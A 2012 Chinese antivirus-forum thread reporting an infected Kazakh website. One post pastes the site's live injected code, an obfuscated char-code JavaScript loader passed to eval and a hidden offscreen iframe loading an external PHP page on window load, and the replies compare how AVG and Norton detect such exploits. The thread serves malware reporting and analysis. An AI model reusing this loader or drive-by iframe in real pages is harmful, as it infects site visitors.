http://centertelecom.kz/【已检测 by 阿狸】

显示全部楼层 · 发表于 2012-11-3 18:36:27

本帖最后由 wjhstu-VxG 于 2012-11-10 16:27 编辑

Website blocked!
G Data InternetSecurity 2013 has denied access to this website.
The site contains infected code: Trojan.JS.Iframe.BYF (Engine A), JS:Iframe-TD [Trj] (Engine B).

显示全部楼层 · 发表于 2012-11-10 15:57:59

这个貌似有戏？

</head>
<body><script>v="val";try{ebgserb++;}catch(snregrx){try{(v+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75&&63&&64&&73&&70&&68&&116&&73&&115&&62&&124&&121&&119&&130&&129&&116&&131&&127&&135&&124&&63&&131&&116&&130&&114&&128&&129&&121&&127&&119&&63&&115&&116&&74&&72&&71&&72&&63&&119&&63&&56&&75&&30&&26&&26&&121&&119&&48&&57&&132&&138&&128&&118&&127&&119&&48&&136&&121&&127&&116&&128&&135&&63&&136&&138&&138&&119&&124&&114&&119&&49&&77&&78&&77&&49&&55&&134&&126&&117&&117&&119&&121&&127&&117&&117&&55&&58&&48&&140&&29&&27&&25&&26&&135&&122&&126&&117&&127&&136&&62&&137&&137&&139&&118&&125&&113&&120&&48&&78&&48&&65&&75&&30&&26&&26&&141&&30&&26&&26&&116&&128&&115&&134&&125&&118&&126&&133&&62&&128&&126&&126&&127&&134&&131&&118&&125&&128&&134&&118&&48&&78&&48&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&25&&122&&118&&49&&56&&136&&121&&127&&116&&128&&135&&63&&136&&138&&138&&119&&124&&114&&119&&49&&77&&78&&77&&49&&64&&58&&48&&140&&29&&27&&25&&26&&25&&136&&121&&127&&116&&128&&135&&63&&136&&138&&138&&119&&124&&114&&119&&49&&77&&49&&65&&76&&29&&27&&25&&26&&25&&135&&113&&131&&48&&121&&117&&114&&116&&49&&77&&49&&116&&128&&115&&134&&125&&118&&126&&133&&62&&120&&117&&133&&85&&125&&117&&126&&117&&127&&132&&132&&82&&138&&100&&114&&119&&95&&113&&126&&117&&57&&55&&121&&117&&114&&116&&56&&57&&108&&64&&110&&75&&30&&26&&26&&25&&26&&134&&114&&130&&49&&131&&116&&130&&122&&128&&133&&48&&78&&48&&117&&127&&116&&133&&126&&117&&127&&132&&63&&115&&131&&117&&114&&132&&118&&85&&125&&117&&126&&117&&127&&132&&57&&55&&132&&115&&131&&121&&129&&132&&56&&57&&76&&29&&27&&25&&26&&25&&132&&115&&131&&121&&129&&132&&63&&132&&138&&128&&118&&48&&78&&48&&56&&132&&118&&136&&133&&63&&123&&113&&135&&113&&132&&115&&131&&121&&129&&132&&56&&75&&30&&26&&26&&25&&26&&131&&116&&130&&122&&128&&133&&62&&128&&126&&131&&117&&114&&116&&138&&131&&133&&113&&133&&117&&116&&120&&114&&126&&120&&117&&49&&77&&49&&118&&134&&126&&116&&132&&122&&127&&127&&48&&57&&57&&49&&139&&30&&26&&26&&25&&26&&25&&122&&118&&49&&56&&133&&120&&122&&131&&63&&130&&118&&113&&117&&137&&100&&132&&114&&132&&118&&48&&78&&77&&49&&55&&116&&127&&126&&128&&125&&117&&133&&117&&56&&57&&49&&139&&30&&26&&26&&25&&26&&25&&26&&135&&122&&126&&117&&127&&136&&62&&137&&137&&139&&118&&125&&113&&120&&48&&78&&48&&67&&75&&30&&26&&26&&25&&26&&25&&142&&29&&27&&25&&26&&25&&142&&75&&30&&26&&26&&25&&26&&131&&116&&130&&122&&128&&133&&62&&128&&126&&125&&127&&114&&116&&49&&77&&49&&118&&134&&126&&116&&132&&122&&127&&127&&56&&58&&48&&140&&29&&27&&25&&26&&25&&26&&135&&122&&126&&117&&127&&136&&62&&137&&137&&139&&118&&125&&113&&120&&48&&78&&48&&67&&75&&30&&26&&26&&25&&26&&141&&76&&29&&27&&25&&26&&25&&132&&115&&131&&121&&129&&132&&63&&131&&131&&115&&49&&77&&49&&133&&131&&124&&49&&59&&49&&93&&114&&132&&121&&62&&131&&113&&127&&116&&128&&125&&57&&57&&63&&132&&128&&99&&133&&130&&122&&126&&120&&56&&58&&62&&132&&133&&115&&131&&133&&130&&122&&126&&120&&56&&68&&57&&49&&59&&49&&55&&63&&122&&132&&55&&76&&29&&27&&25&&26&&25&&121&&117&&114&&116&&63&&113&&129&&128&&118&&126&&117&&83&&121&&121&&125&&116&&57&&131&&116&&130&&122&&128&&133&&57&&76&&29&&27&&25&&26&&141&&30&&26&&26&&141&&76&&29&&27&&141&&58&&56&&58&&75".split("&&");h=2;s="";if(m)for(i=0;i-695!=0;i=1+i){k=i;if(window.document)s+=String.fromCharCode(n[i]-(020+i%h));}z=s;if(021===0x11)ev(z);}</script><script type="text/javascript">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://breiter.home.pl/2k/faq.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>

谁会解？

显示全部楼层 · 发表于 2012-11-10 16:18:39

本帖最后由 iyinyt 于 2012-11-10 16:19 编辑

wjhstu-VxG 发表于 2012-11-10 15:57
这个貌似有戏？

刚打看卡饭这个网页，AVG就报了，一看原来是你贴了代码~话说吓了我一跳

Ashampoo_Snap_2012.11.10_08h17m26s_001_.png

显示全部楼层 · 发表于 2012-11-10 16:26:47

iyinyt 发表于 2012-11-10 16:18
刚打看卡饭这个网页，AVG就报了，一看原来是你贴了代码~话说吓了我一跳

额好吧我看看怎么才能避免话说avg不错报的那么详细；exploit貌似小白还完全没办法接……

显示全部楼层 · 发表于 2012-11-10 16:29:38

小A报的

显示全部楼层 · 发表于 2012-11-10 16:31:25

wjhstu-VxG 发表于 2012-11-10 16:26
额好吧我看看怎么才能避免话说avg不错报的那么详细；exploit貌似小白还完全没办法接……

嗯 AVG的LinkScan防漏洞和Norton的IPS很像的，都是直接堵漏洞，而不是单纯的流量扫描~

显示全部楼层 · 发表于 2012-11-10 16:34:15

iyinyt 发表于 2012-11-10 16:31
嗯 AVG的LinkScan防漏洞和Norton的IPS很像的，都是直接堵漏洞，而不是单纯的流量扫描~

嗯，但是诺顿貌似为了优化性能，有些漏洞检测优先级都放在最后，系统没漏洞的话，他就不检测，或者不报……

显示全部楼层 · 发表于 2012-11-10 16:37:39

wjhstu-VxG 发表于 2012-11-10 16:34
嗯，但是诺顿貌似为了优化性能，有些漏洞检测优先级都放在最后，系统没漏洞的话，他就不检测，或者不报… ...

对对，以前遇到过这种，别家基本都报了，很明显的，发现NIS就是不报，当时我就很奇怪。后来想了想才明白，有漏洞没被利用，也许他就不报，而不像其他的扫描到就报，其实很多是对于打了补丁的没有危害的。

显示全部楼层 · 发表于 2012-11-10 17:46:28

iyinyt 发表于 2012-11-10 16:37
对对，以前遇到过这种，别家基本都报了，很明显的，发现NIS就是不报，当时我就很奇怪。后来想了想才明白 ...

嗯有些放到xp上就报……

还有你的这个是润滑油无限循环？

显示全部楼层 · 发表于 2012-11-10 19:03:05

wjhstu-VxG 发表于 2012-11-10 17:46
嗯有些放到xp上就报……

还有你的这个是润滑油无限循环？

什么叫“润滑油无限循环”？

[已鉴定] http://centertelecom.kz/【已检测 by 阿狸】

评分

评分